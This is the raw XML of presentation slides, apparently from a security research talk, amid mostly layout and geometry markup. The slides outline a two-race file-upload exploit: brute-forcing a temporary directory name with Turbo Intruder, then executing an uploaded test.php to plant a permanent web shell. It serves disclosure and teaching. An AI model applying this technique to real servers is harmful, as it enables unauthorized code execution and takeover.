          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736560" y="849240"/>
            <a:ext cx="10759680" cy="839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6610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="608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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="608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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518480" y="1774800"/>
            <a:ext cx="9135360" cy="1678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6610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="608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Timeline of race conditions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="608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TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295240" y="6389280"/>
            <a:ext cx="189612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79" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2824920" y="3421800"/>
            <a:ext cx="2264040" cy="1160640"/>
            <a:chOff x="2824920" y="3421800"/>
            <a:chExt cx="2264040" cy="1160640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="180" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2824920" y="3513960"/>
              <a:ext cx="2264040" cy="1068480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 2264040"/>
                <a:gd name="textAreaRight" fmla="*/ 2264400 w 2264040"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1068480"/>
                <a:gd name="textAreaBottom" fmla="*/ 1068840 h 1068480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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477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81" name="TextBox 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3254760" y="3421800"/>
              <a:ext cx="1649880" cy="1160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1678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2" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4963680" y="3421800"/>
            <a:ext cx="2264040" cy="1160640"/>
            <a:chOff x="4963680" y="3421800"/>
            <a:chExt cx="2264040" cy="1160640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="183" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4963680" y="3513960"/>
              <a:ext cx="2264040" cy="1068480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 2264040"/>
                <a:gd name="textAreaRight" fmla="*/ 2264400 w 2264040"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1068480"/>
                <a:gd name="textAreaBottom" fmla="*/ 1068840 h 1068480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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477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84" name="TextBox 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5393880" y="3421800"/>
              <a:ext cx="1649880" cy="1160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1678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5" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7102800" y="3421800"/>
            <a:ext cx="2264040" cy="1160640"/>
            <a:chOff x="7102800" y="3421800"/>
            <a:chExt cx="2264040" cy="1160640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="186" name="Freeform 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7102800" y="3513960"/>
              <a:ext cx="2264040" cy="1068480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 2264040"/>
                <a:gd name="textAreaRight" fmla="*/ 2264400 w 2264040"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1068480"/>
                <a:gd name="textAreaBottom" fmla="*/ 1068840 h 1068480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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477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87" name="TextBox 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7532640" y="3421800"/>
              <a:ext cx="1649880" cy="1160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1678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8" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9241920" y="3421800"/>
            <a:ext cx="2264040" cy="1160640"/>
            <a:chOff x="9241920" y="3421800"/>
            <a:chExt cx="2264040" cy="1160640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="189" name="Freeform 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9241920" y="3513960"/>
              <a:ext cx="2264040" cy="1068480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 2264040"/>
                <a:gd name="textAreaRight" fmla="*/ 2264400 w 2264040"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1068480"/>
                <a:gd name="textAreaBottom" fmla="*/ 1068840 h 1068480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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477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90" name="TextBox 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9671760" y="3421800"/>
              <a:ext cx="1649880" cy="1160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1678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91" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310040" y="3768480"/>
            <a:ext cx="1196280" cy="589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1548"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-52">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>TO = start search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ts val="1548"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-32">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>for volatile dir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TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3456000" y="3644280"/>
            <a:ext cx="1158120" cy="98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1942"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>T1-found dir,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ts val="1942"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-63">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>start search for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ts val="1942"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-63">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>test.php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TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645160" y="3799800"/>
            <a:ext cx="1122120" cy="817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just" defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="1610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="7">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>T2=test.php is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  <a:p>
            <a:pPr algn="just" defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="1610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>written locally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TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7683120" y="3684600"/>
            <a:ext cx="1218600" cy="984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1551"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-12">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>T3=test.php is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ts val="1551"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-24">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>found &amp; exec-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ts val="1551"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-29">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>ed, perm shell is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ts val="1551"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="24">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>written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TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9905760" y="3711240"/>
            <a:ext cx="1116360" cy="1036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1633"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>T4=test.php &amp;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ts val="1633"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-18">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>volatile dir are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ts val="1633"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1430" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PT Sans"/>
                <a:ea typeface="PT Sans"/>
              </a:rPr>
              <a:t>deleted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="143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0CF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320040"/>
            <a:ext cx="5632704" cy="6400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8640" y="128016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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Scan for Slides +</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Research Resources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560320"/>
            <a:ext cx="5303520" cy="2560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sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="10CFC9"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>✓  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>Concrete Evidence - Two Races, One RCE (this talk)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="10CFC9"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>✓  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>VESTA Takeover - PortSwigger Top 10 nominee, BlueHat 2025</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="10CFC9"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>✓  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>Feeld App - hacking a 50M+ user dating app, DEFCON 33</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="10CFC9"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>✓  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>Technical research blog with full write-ups and CVEs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766560" y="457200"/>
            <a:ext cx="4389120" cy="5120640"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EDEA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7" name="Picture 6" descr="dso-qr-cod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320" y="731520"/>
            <a:ext cx="3657600" cy="3657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66560" y="4526280"/>
            <a:ext cx="438912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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>fortbridge.co.uk/dso-resources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66560" y="4892040"/>
            <a:ext cx="43891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200">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Point your phone camera at the QR code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784848"/>
            <a:ext cx="12191695" cy="73152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F89AB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48640" y="6126480"/>
            <a:ext cx="4572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>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>FORTBRIDGE - Offensive Security Experts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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374040" y="128160"/>
            <a:ext cx="11818440" cy="747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5890"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="42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–Timeline of 2 races Explained</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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TextBox 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295240" y="6384240"/>
            <a:ext cx="192132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TextBox 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376560" y="1386720"/>
            <a:ext cx="10888920" cy="470898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212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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T0 you start the upload request AND you also start searching for the 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the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volatile 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dir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name. You have 1M possibilities, we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>sent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16-17K RPS, so you can easily brute-force 500-700K in ~30 sec, that’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;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50% chance, works great. We didn’t queue 1M requests, due to some issues with Turbo Intruder.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212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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T1 you discover the volatile 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dir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name (win first race), but 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test.php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is not there yet. Thus you have to start searching for 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test.php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(2nd race condition in the file upload) which will ALWAYS be written after ~30 seconds (after T0). We’ll queue another 500K requests in Turbo Intruder for this.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212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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T2 (~ 30th second) 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test.php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is written locally, inside the volatile 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dir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212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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T3 one of the queued requests from T1 executes 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test.php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and writes a perm shell in the parent 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dir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(“/application/files/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tmp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”)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212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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T4 both volatile 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dir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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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deleted, but we already have a shell 🙂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Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657680" y="1038240"/>
            <a:ext cx="7210080" cy="4762080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 7210080"/>
              <a:gd name="textAreaRight" fmla="*/ 7210440 w 7210080"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 4762080"/>
              <a:gd name="textAreaBottom" fmla="*/ 4762440 h 4762080"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="7210425" h="4762500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7210425" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7210425" y="4762500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47625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TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558720" y="1035360"/>
            <a:ext cx="3914640" cy="3250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5119"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="47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–1st race - guess the Temp Dir </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="47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5119"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="47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TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705200" y="6180120"/>
            <a:ext cx="243504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Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="685764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06" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="857880" y="1219320"/>
            <a:ext cx="5435280" cy="4419360"/>
            <a:chOff x="857880" y="1219320"/>
            <a:chExt cx="5435280" cy="4419360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="857880" y="1219320"/>
              <a:ext cx="5435280" cy="4419360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 5435280"/>
                <a:gd name="textAreaRight" fmla="*/ 5435640 w 5435280"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 4419360"/>
                <a:gd name="textAreaBottom" fmla="*/ 4419720 h 4419360"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="7247382" h="5892800">
                  <a:moveTo>
                    <a:pt x="5062347" y="438785"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5067554" y="439674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5063363" y="440182"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5062348" y="440055"/>
                    <a:pt x="5062348" y="438785"/>
                    <a:pt x="5062348" y="438785"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2897632" y="113157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2902458" y="113157"/>
                    <a:pt x="2907157" y="113411"/>
                    <a:pt x="2911983" y="114046"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2450846" y="199390"/>
                    <a:pt x="2017522" y="351282"/>
                    <a:pt x="1621282" y="604647"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1181735" y="885571"/>
                    <a:pt x="835914" y="1259459"/>
                    <a:pt x="565023" y="1707896"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377190" y="2018157"/>
                    <a:pt x="234188" y="2349119"/>
                    <a:pt x="119253" y="2693416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112903" y="2712339"/>
                    <a:pt x="105918" y="2731135"/>
                    <a:pt x="98044" y="2749677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139573" y="2409190"/>
                    <a:pt x="247523" y="2080514"/>
                    <a:pt x="415290" y="1782826"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="767207" y="1152779"/>
                    <a:pt x="1281557" y="705231"/>
                    <a:pt x="1923161" y="403606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2220849" y="262509"/>
                    <a:pt x="2537206" y="166497"/>
                    <a:pt x="2862072" y="118999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2873502" y="115062"/>
                    <a:pt x="2885440" y="113157"/>
                    <a:pt x="2897505" y="113157"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5088255" y="445770"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5125974" y="459486"/>
                    <a:pt x="5164074" y="472694"/>
                    <a:pt x="5201920" y="486918"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5241671" y="502031"/>
                    <a:pt x="5281295" y="517525"/>
                    <a:pt x="5320665" y="533654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5677154" y="678434"/>
                    <a:pt x="6018022" y="852678"/>
                    <a:pt x="6326505" y="1087501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6587744" y="1286256"/>
                    <a:pt x="6813550" y="1518666"/>
                    <a:pt x="6971538" y="1813052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7075043" y="2004187"/>
                    <a:pt x="7139178" y="2214880"/>
                    <a:pt x="7159879" y="2432177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7171563" y="2548509"/>
                    <a:pt x="7170548" y="2665730"/>
                    <a:pt x="7156450" y="2781681"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7101078" y="2383536"/>
                    <a:pt x="6954901" y="2035302"/>
                    <a:pt x="6733286" y="1719072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6457823" y="1326261"/>
                    <a:pt x="6102858" y="1022985"/>
                    <a:pt x="5701665" y="772160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5503926" y="650748"/>
                    <a:pt x="5298948" y="541655"/>
                    <a:pt x="5088382" y="445643"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5632450" y="5226050"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5633339" y="5227955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5631180" y="5227955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5632577" y="5226050"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5619623" y="5236591"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5189728" y="5514975"/>
                    <a:pt x="4739132" y="5722366"/>
                    <a:pt x="4247896" y="5791962"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3742817" y="5813298"/>
                  </a:lnTo>
                  <a:lnTo>
